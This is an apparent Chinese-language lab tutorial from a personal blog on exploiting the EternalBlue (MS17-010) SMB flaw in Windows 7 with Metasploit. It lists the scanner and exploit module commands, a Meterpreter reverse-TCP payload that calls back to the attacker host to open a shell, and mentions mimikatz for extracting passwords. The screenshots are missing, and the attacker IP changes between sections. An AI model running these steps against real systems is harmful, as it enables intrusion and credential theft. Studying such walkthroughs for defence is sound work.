安全

永恒之蓝

eternalBlue

Posted by XT on June 6, 2019

MS017-010

永恒之蓝漏洞介绍

一、445端口介绍

445端口是一个毁誉参半的端口,有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机,但也正是因为有了它,黑客们才有了可乘之机,他们能通过该端口偷偷共享你的硬盘,甚至会在悄无声息中将你的硬盘格式化掉!

2017年10月,由于病毒”坏兔子”来袭,国家互联网应急中心等安全机构建议用户及时关闭计算机以及网络设备上的445和139端口

二、准备

  • Kali系统 版本:2.0 IP:192.168.0.129

  • Win7系统 IP:192.168.203.147 开放端口:445

  • MSF框架版本:4.14.17版本以上

  • 安装更新metasploit

三、渗透过程

0x01 查看msf版本

在终端输入msfconsole

1561792537458

0x02 安装更新metasploit

终端输入apt-get install metasploit-framework

img

0x03 漏洞模块路经查询

search ms17-010

1561792623076

0x04 加载扫描模块

use auxiliary/scanner/smb/smb_ms17_010
show options
set rhosts 192.168.203.147       (靶机的IP)
exploit

1561792903874

0x05 加载攻击模块并配置参数

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
show options
set rhost 192.168.203.147 (靶机的IP)
set lhost 192.168.203.139 (发起攻击的主机IP)
set lport 443       (监听的端口)

1561795169356

0x06 发起攻击,成功会反弹shell

四、Meterpreter功能展现

使用mimikatz破解出密码。

1561795342339

CATALOG
    FEATURED TAGS
    文艺 安全 运维 开发